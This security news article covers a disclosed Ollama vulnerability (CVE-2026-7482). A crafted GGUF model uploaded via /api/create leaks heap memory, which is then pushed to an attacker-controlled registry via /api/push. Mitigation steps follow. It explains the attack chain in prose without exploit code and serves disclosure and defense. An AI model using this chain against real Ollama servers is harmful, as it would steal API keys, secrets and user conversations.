Bleeding Llama: Critical Ollama Vulnerability Exposes Memory on 300,000 Servers

CVE-2026-7482: An unauthenticated remote attacker can exfiltrate memory from Ollama servers using specially crafted GGUF models. Users are urged to patch to ve…

Bleeding Llama: Critical Ollama Vulnerability Exposes Memory on 300,000 Servers

On May 12, 2026, security firm Cyera disclosed CVE-2026-7482, a critical vulnerability in Ollama’s GGUF loader that allows unauthenticated remote attackers to read the entire process memory of a target server. With a CVSS score of 9.1 and an estimated 300,000 servers potentially exposed, the flaw subverts the core promise of self-hosted AI. Local infrastructure, often chosen for privacy and compliance, has been transformed into a remote attack surface capable of leaking API keys, environment variables, and private user conversations.

Key Takeaways
  • A heap out-of-bounds read exists in Ollama's GGUF quantization path, stemming from the use of Go’s unsafe package within fs/ggml/gguf.go and server/quantization.go (WriteTo).
  • The unauthenticated remote attack involves uploading a GGUF file with manipulated tensors via /api/create, triggering an out-of-bounds read during the quantization process.
  • Leaked memory can contain environment variables, API keys, system prompts, and concurrent user chat data, which can then be exfiltrated via /api/push to an attacker-controlled registry.
  • Over 300,000 Ollama servers are estimated to be exposed globally; all versions prior to 0.17.1 are vulnerable.

Technical Breakdown: From Crafted GGUF Models to Heap Leaks

The core of the vulnerability lies in the GGUF parser, the standard binary format for Llama-compatible models. Ollama utilizes Go's unsafe package for quantization operations in the path spanning fs/ggml/gguf.go to server/quantization.go, specifically within the WriteTo() function. This bypass of standard memory safety checks allows the application to read and write directly to memory areas without the usual constraints of the Go runtime.

When a user—or an attacker—uploads a model file through the /api/create endpoint, the parser reads tensor metadata without validating the declared dimensions against the actual length of the allocated buffer. A GGUF file crafted with inflated offsets or dimensions forces the quantization cycle to read beyond the heap buffer boundaries. This results in an out-of-bounds read that exposes arbitrary blocks of Ollama's process memory, which may contain sensitive data handled in previous sessions.

The Exfiltration Chain: Leveraging /api/create and /api/push

The risk extends beyond a simple leak; an attacker can weaponize stolen memory into an exfiltratable artifact. After triggering the out-of-bounds read, the leaked data is incorporated into the newly quantized model. The attacker can then upload this model to a controlled external registry via the /api/push endpoint. Consequently, data that remains invisible on the compromised server becomes accessible to the entity controlling the push destination.

According to Cyera’s analysis, recoverable data includes environment variables, API keys, proprietary code fragments, system prompts, and even the conversations of concurrent users. The entire chain is remote and requires no authentication, exploiting the common OLLAMA_HOST=0.0.0.0 configuration that frequently exposes the REST interface to public networks.

The Self-Hosted AI Paradox

This disclosure challenges a widespread assumption among organizations migrating LLM workloads on-premises: that self-hosting inherently guarantees greater security and data control. With over 170,000 GitHub stars, Ollama has become the industry standard for running local models without relying on cloud APIs. However, this massive adoption has expanded the attack surface, with an estimated 300,000 servers exposed globally—often without default authentication on REST endpoints.

The lack of a native authentication mechanism for /api/create and /api/push means anyone capable of reaching the service port can interact with the inference engine. For organizations integrating Ollama with development tools like Claude Code, the impact extends to all tool outputs passing through the server, which accumulate in the heap and enrich the potential leak.

"An attacker can learn basically anything about the organization from your AI inference — API keys, proprietary code, customer contracts, and much more" — Dor Attias, Cyera Researcher

Risk Assessment and Global Exposure

While there is currently no confirmation of active exploitation in the wild, the combination of an unauthenticated remote exploit and a large population of exposed servers makes the risk immediate. Organizations that have deployed Ollama on cloud instances or edge servers with bindings to 0.0.0.0 are effectively providing direct, unrestricted access to the model parsing engine.

The figure of 300,000 servers is an estimate based on the project’s global adoption and observed configurations, rather than an audit of confirmed breaches. However, this does not diminish the severity of the threat; the number serves as a critical indicator of exposure. All versions of Ollama prior to 0.17.1 are confirmed to be affected.

Mitigation and Defensive Measures

  • Immediately update Ollama to version 0.17.1 or later to apply the necessary security patches.
  • Remove or restrict the OLLAMA_HOST=0.0.0.0 variable. Limit access to the local network or segments protected by a VPN or firewall to prevent direct internet exposure.
  • Implement authentication and authorization for REST endpoints, specifically /api/create and /api/push. Since Ollama lacks native authentication by default, use a reverse proxy with mTLS, API keys, or similar mechanisms.
  • Monitor logs for anomalous requests to /api/create involving GGUF files from untrusted sources and audit for unauthorized pushes to external registries.

The Evolution of Model Formats as Attack Vectors

The lesson of "Bleeding Llama" transcends this specific bug. In an ecosystem where model files are binary assets executed by an inference server, the line between data and code continues to blur. The GGUF parser is not merely a metadata reader; it is an engine performing high-privilege mathematical transformations on tensors. When that engine utilizes unsafe primitives and bypasses boundary checks, the file format itself becomes a payload.

For enterprises that invested in Ollama to keep data in-house, CVE-2026-7482 serves as a strategic warning: self-hosting is an architectural choice, not a security guarantee. Without rigorous network hardening, authentication, and input validation, a local server remains a goldmine of secrets accessible to anyone capable of building the right model.

Frequently Asked Questions

Why did Go's unsafe package enable this leak?

Ollama uses the unsafe package in its quantization path to gain direct access to GGUF file tensors, bypassing the Go runtime's memory safety protections. Because the parser fails to validate tensor dimensions against the real buffer length, the WriteTo() function reads past heap buffer limits, exposing arbitrary process memory.

Is updating to Ollama 0.17.1 enough to resolve the issue?

Version 0.17.1 contains the specific patch for CVE-2026-7482. However, it is not yet confirmed if variants or bypasses exist. Security experts recommend combining the update with additional layers of defense, such as network segmentation and endpoint authentication.

Does exfiltration require the /api/push endpoint?

The exploit chain documented by Cyera and The Hacker News utilizes /api/push to send leaked data to an attacker-controlled registry. While it is unclear if this endpoint is enabled by default in every environment, restricting its use and monitoring its calls is a high-priority countermeasure.

Sources

Information has been verified against cited sources and is current as of the time of publication.